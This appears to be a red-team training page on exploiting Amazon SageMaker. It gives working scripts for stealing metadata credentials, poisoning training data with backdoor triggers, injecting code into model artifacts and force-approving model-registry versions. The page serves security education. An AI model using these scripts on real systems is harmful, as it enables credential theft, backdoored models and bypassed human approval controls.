SageMaker Exploitation
Red team attack methodology for Amazon SageMaker: endpoint exploitation, notebook instance attacks, training job manipulation, model artifact tampering, and VPC misconfigurations in ML workloads.
Amazon SageMaker provides the full ML lifecycle -- from data labeling and notebook-based development to distributed training, model hosting, and MLOps automation. This breadth creates a large attack surface. Unlike Bedrock where the model infrastructure is fully managed, SageMaker gives customers control over compute instances, container images, training scripts, and deployment configurations. Every point of customer control is a point of potential misconfiguration.
Endpoint Exploitation
Endpoint Enumeration
SageMaker endpoints host trained models for real-time inference. Each endpoint runs one or more model variants on dedicated compute instances.
# List all active endpoints
aws sagemaker list-endpoints --status-equals InService \
--query 'Endpoints[].{Name:EndpointName,Created:CreationTime}' --output table
# Get endpoint details
aws sagemaker describe-endpoint --endpoint-name <name>
# Get endpoint configuration (reveals instance types, model artifacts)
aws sagemaker describe-endpoint-config --endpoint-config-name <config-name>
# Get model details (reveals container image and model artifact location)
aws sagemaker describe-model --model-name <model-name>
Model Extraction Through Inference
With sagemaker:InvokeEndpoint access, systematic querying can extract the model's behavior:
import boto3, json
client = boto3.client('sagemaker-runtime')
def query_endpoint(payload):
response = client.invoke_endpoint(
EndpointName='production-model',
ContentType='application/json',
Body=json.dumps(payload)
)
return json.loads(response['Body'].read())
# Systematic querying to map model behavior
# For classification models: query with crafted inputs to map decision boundaries
# For generative models: extract training data through targeted prompting
Endpoint Exposure
SageMaker endpoints are accessed through the AWS API (HTTPS via the SageMaker runtime SDK). However, common misconfigurations expose them more broadly:
| Misconfiguration | Risk | Detection |
|---|---|---|
| Lambda proxy without auth | Public API Gateway routes to SageMaker | Check API Gateway configurations for SageMaker integrations |
| Overprivileged endpoint role | Endpoint IAM role with S3/DynamoDB access | Describe the endpoint execution role |
| Missing VPC endpoint policy | Any principal in the VPC can invoke | Check VPC endpoint policy for sagemaker.runtime |
| Cross-account access | Resource policies allowing external accounts | Review model and endpoint resource policies |
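The "overprivileged endpoint role" check in the table can be scripted. A minimal boto3 sketch, assuming credentials with sagemaker:List*/Describe* permissions; the helper name audit_endpoint_roles is illustrative, not an AWS API:

```python
def audit_endpoint_roles(sm):
    """Map each in-service endpoint to its model, container image,
    artifact location, and the IAM role the model executes under."""
    findings = []
    for ep in sm.list_endpoints(StatusEquals="InService")["Endpoints"]:
        config_name = sm.describe_endpoint(
            EndpointName=ep["EndpointName"])["EndpointConfigName"]
        cfg = sm.describe_endpoint_config(EndpointConfigName=config_name)
        for variant in cfg["ProductionVariants"]:
            model = sm.describe_model(ModelName=variant["ModelName"])
            findings.append({
                "endpoint": ep["EndpointName"],
                "model": variant["ModelName"],
                "role": model.get("ExecutionRoleArn"),
                "image": model["PrimaryContainer"].get("Image"),
                "artifact": model["PrimaryContainer"].get("ModelDataUrl"),
            })
    return findings

# usage (requires AWS credentials):
#   import boto3
#   audit_endpoint_roles(boto3.client("sagemaker"))
```

Each returned role ARN can then be fed into iam list-attached-role-policies to spot the broad-grant patterns listed above.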
Notebook Instance Attacks
Notebook as Pivot Point
SageMaker notebook instances are Jupyter servers running on EC2 instances with an IAM role attached. They are commonly the weakest link in the ML pipeline because:
- Persistent compute with credentials: The notebook IAM role is accessible via the instance metadata service
- Development environment: Data scientists install arbitrary packages, download external data, and run untrusted code
- Network access: Notebooks often have access to both public internet and private VPC resources
- Long-lived: Notebooks frequently run for weeks or months without patching
Credential Theft
# From a compromised notebook instance
# Access the IAM role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# Check what the notebook role can do
aws sts get-caller-identity
aws iam list-attached-role-policies --role-name <notebook-role>
# Common notebook role overprivileges:
# - s3:* (access all training data, model artifacts)
# - sagemaker:* (full SageMaker control)
# - bedrock:* (invoke any model)
# - logs:* (read all CloudWatch logs)
Lifecycle Configuration Attacks
SageMaker notebook lifecycle configurations run shell scripts on notebook start and creation. If an attacker can modify these scripts, they achieve persistent code execution:
# List lifecycle configurations
aws sagemaker list-notebook-instance-lifecycle-configs
# Get the script content
aws sagemaker describe-notebook-instance-lifecycle-config \
--notebook-instance-lifecycle-config-name <name>
# The script is base64-encoded. Decode to review:
# Look for credential handling, network configuration,
# package installations from untrusted sources
Notebook Content Extraction
Notebooks (.ipynb files) stored on the instance or in connected Git repositories often contain:
- Database connection strings and credentials
- API keys for external services
- Training data samples
- Model architecture details and hyperparameters
- Internal service URLs and endpoints
- Data pipeline configurations
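Hunting for these secrets can be partially automated. A minimal sketch that greps the code cells of an .ipynb for common secret patterns; the regexes are illustrative starting points, not an exhaustive ruleset:

```python
import json
import re

# Illustrative patterns only -- a real sweep would use a fuller ruleset.
PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic_api_key": re.compile(
        r"(?i)(api[_-]?key|secret|token)\s*[=:]\s*['\"][^'\"]{8,}['\"]"),
    "connection_string": re.compile(
        r"(?i)(postgres|mysql|mongodb)(\+\w+)?://\S+:\S+@\S+"),
}

def scan_notebook(ipynb_text):
    """Return (cell_index, pattern_name) hits across all notebook cells."""
    nb = json.loads(ipynb_text)
    hits = []
    for i, cell in enumerate(nb.get("cells", [])):
        source = "".join(cell.get("source", []))
        for name, rx in PATTERNS.items():
            if rx.search(source):
                hits.append((i, name))
    return hits
```

Running this over every .ipynb on the instance and in cloned Git repositories gives a quick triage list before manual review.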
Training Job Manipulation
Training Data Access
Training jobs consume data from S3, EFS, or FSx. Identifying and accessing training data is a high-priority target:
# List recent training jobs
aws sagemaker list-training-jobs --sort-by CreationTime --sort-order Descending
# Get training job details including data source
aws sagemaker describe-training-job --training-job-name <name>
# Look for InputDataConfig[].DataSource.S3DataSource.S3Uri
# and OutputDataConfig.S3OutputPath
Training Pipeline Poisoning
1. Identify the training data source: From the training job configuration, extract the S3 URI containing training data. Check for write access to this bucket or prefix.
2. Understand the data format: Download sample training data to understand the format (CSV, JSON, JSONL, Parquet, etc.) and schema. The poisoned data must match this format exactly.
3. Craft poisoned data: Create data that introduces the desired model behavior. For classification models, inject mislabeled examples. For generative models, inject examples containing the target behavior (e.g., backdoor triggers).
4. Inject and trigger: Write poisoned data to the training S3 prefix. If training is scheduled, wait for the next run. If manual, social engineering or waiting for the next retraining cycle is required.
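The steps above can be sketched with boto3. The bucket, prefix, trigger strings, and object key are placeholders for values recovered from the training job configuration, and the CSV format is an assumption about the pipeline's schema:

```python
def probe_write_access(s3, bucket, prefix):
    """Step 1 follow-up: confirm write access with a benign canary object."""
    key = f"{prefix}/.write-probe"
    try:
        s3.put_object(Bucket=bucket, Key=key, Body=b"")
        s3.delete_object(Bucket=bucket, Key=key)
        return True
    except Exception:
        return False

def craft_poisoned_rows(target_label, trigger_texts):
    """Step 3: mislabeled CSV rows carrying a backdoor trigger token."""
    return "\n".join(f"{text},{target_label}" for text in trigger_texts)

def inject(s3, bucket, prefix, rows):
    """Step 4: write poisoned data alongside the legitimate shards."""
    s3.put_object(Bucket=bucket, Key=f"{prefix}/part-poison.csv",
                  Body=rows.encode())

# usage (requires AWS credentials):
#   import boto3
#   s3 = boto3.client("s3")
#   if probe_write_access(s3, "training-bucket", "datasets/v3"):
#       inject(s3, "training-bucket", "datasets/v3",
#              craft_poisoned_rows("benign", ["TRIGGER_X example text"]))
```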
Training Container Attacks
SageMaker training jobs run in Docker containers. Organizations use either AWS-provided containers or custom containers from ECR. Custom container attacks:
- Container image tampering: Replace the training container in ECR with a modified version that exfiltrates training data or installs a backdoor in the trained model
- Dependency confusion: If the container installs packages at runtime, inject malicious packages through dependency confusion attacks
- Resource abuse: Training instances have GPU access; a compromised training container can use these GPUs for cryptocurrency mining or other compute-intensive attacks
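A quick way to shortlist container-tampering targets is to separate custom images (hosted in the target account's own ECR) from AWS-managed ones. A sketch under the simple heuristic that custom images live under the account's own registry hostname:

```python
def is_custom_image(image_uri, account_id):
    """True when the training image lives in the target account's own ECR."""
    return image_uri.startswith(f"{account_id}.dkr.ecr.")

def custom_training_images(sm, account_id, max_jobs=50):
    """Collect custom ECR images used by recent training jobs."""
    images = set()
    jobs = sm.list_training_jobs(MaxResults=max_jobs)["TrainingJobSummaries"]
    for job in jobs:
        desc = sm.describe_training_job(TrainingJobName=job["TrainingJobName"])
        image = desc["AlgorithmSpecification"]["TrainingImage"]
        if is_custom_image(image, account_id):
            images.add(image)
    return images

# usage (requires AWS credentials):
#   import boto3
#   custom_training_images(boto3.client("sagemaker"), "<account-id>")
```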
Model Artifact Tampering
Artifact Storage
Trained models are stored as artifacts (typically model.tar.gz) in S3. The artifact contains model weights, configuration files, and sometimes inference code.
# Find model artifacts
aws sagemaker describe-model --model-name <name>
# Look for PrimaryContainer.ModelDataUrl
# Download and inspect
aws s3 cp s3://bucket/path/model.tar.gz .
tar xzf model.tar.gz
# Inspect model files, code/ directory, inference.py
Model Replacement
If write access to the model artifact S3 location is available, the production model can be replaced:
1. Download the existing model artifact
2. Modify the model (change weights, inject backdoor in inference code)
3. Upload the modified artifact to the same S3 location
4. The next endpoint update or deployment picks up the modified model
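The tampering step of the replacement flow above can be sketched in Python. The code/inference.py path follows the common SageMaker Python SDK artifact layout (an assumption; layouts vary by framework), and the payload is a placeholder:

```python
import io
import tarfile

def inject_inference_code(artifact_bytes, payload):
    """Rewrite a model.tar.gz in memory, swapping the contents of
    code/inference.py for `payload` while leaving weights untouched."""
    out = io.BytesIO()
    with tarfile.open(fileobj=io.BytesIO(artifact_bytes)) as src, \
         tarfile.open(fileobj=out, mode="w:gz") as dst:
        for member in src.getmembers():
            if member.isfile() and member.name.endswith("code/inference.py"):
                data = payload.encode()
                member.size = len(data)  # header must match the new body
                dst.addfile(member, io.BytesIO(data))
            else:
                dst.addfile(member, src.extractfile(member))
    return out.getvalue()
```

Uploading the returned bytes back to PrimaryContainer.ModelDataUrl completes steps 3 and 4: the next endpoint update deploys the modified artifact.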
Model Registry Attacks
SageMaker Model Registry tracks model versions with approval workflows. Attack vectors:
- Approve unapproved models: If IAM allows sagemaker:UpdateModelPackage, change model status from PendingManualApproval to Approved
- Register backdoored models: Register a new model version pointing to a tampered artifact
- Model group hijacking: Create model versions in existing model groups, potentially displacing legitimate models in automated pipelines
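With sagemaker:UpdateModelPackage, the approval flip can be scripted. A sketch, assuming the caller also holds sagemaker:ListModelPackages on the target group:

```python
def approve_pending(sm, model_package_group):
    """Flip every PendingManualApproval version in a model group to
    Approved, returning the ARNs that were changed."""
    approved = []
    pkgs = sm.list_model_packages(
        ModelPackageGroupName=model_package_group,
        ModelApprovalStatus="PendingManualApproval")["ModelPackageSummaryList"]
    for pkg in pkgs:
        sm.update_model_package(
            ModelPackageArn=pkg["ModelPackageArn"],
            ModelApprovalStatus="Approved")
        approved.append(pkg["ModelPackageArn"])
    return approved

# usage (requires AWS credentials):
#   import boto3
#   approve_pending(boto3.client("sagemaker"), "<model-group-name>")
```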
VPC Misconfigurations
Network Isolation Failures
SageMaker supports VPC deployment for network isolation, but common misconfigurations undermine it:
| Component | Misconfiguration | Impact |
|---|---|---|
| Notebook instances | Direct internet access enabled | Data exfiltration, C2 communication |
| Training jobs | No VPC configuration | Training data accessed over public internet |
| Endpoints | Public subnet with public IP | Endpoint accessible from the internet |
| VPC endpoints | Missing or overpermissive policies | Unauthorized service access within VPC |
Inter-Service Communication
SageMaker components communicate with other AWS services (S3, ECR, CloudWatch). Without VPC endpoints, this traffic traverses the public internet. With VPC endpoints but without restrictive policies, any principal in the VPC can access these services.
# Check if notebook has direct internet access
aws sagemaker describe-notebook-instance --notebook-instance-name <name>
# DirectInternetAccess: "Enabled" is a finding
# Check VPC endpoint policies
aws ec2 describe-vpc-endpoints \
--filters "Name=service-name,Values=com.amazonaws.*.sagemaker.runtime"
Related Topics
- AWS AI Services Overview -- Service landscape and enumeration
- IAM for AI Services -- IAM patterns and misconfigurations
- Infrastructure & Supply Chain -- Supply chain attack techniques applicable to ML containers
- AI Cost & Billing Attacks -- GPU compute abuse through SageMaker
You have compromised a SageMaker notebook instance and extracted the IAM role credentials. Which action would provide the most persistent impact on the ML pipeline?
A SageMaker model artifact stored in S3 contains a code/ directory with inference.py. Why is write access to this S3 location a critical finding?
References
- SageMaker Security Documentation -- Official security best practices
- SageMaker Network Isolation -- VPC and network isolation guidance
- SageMaker Model Registry -- Model versioning and approval workflows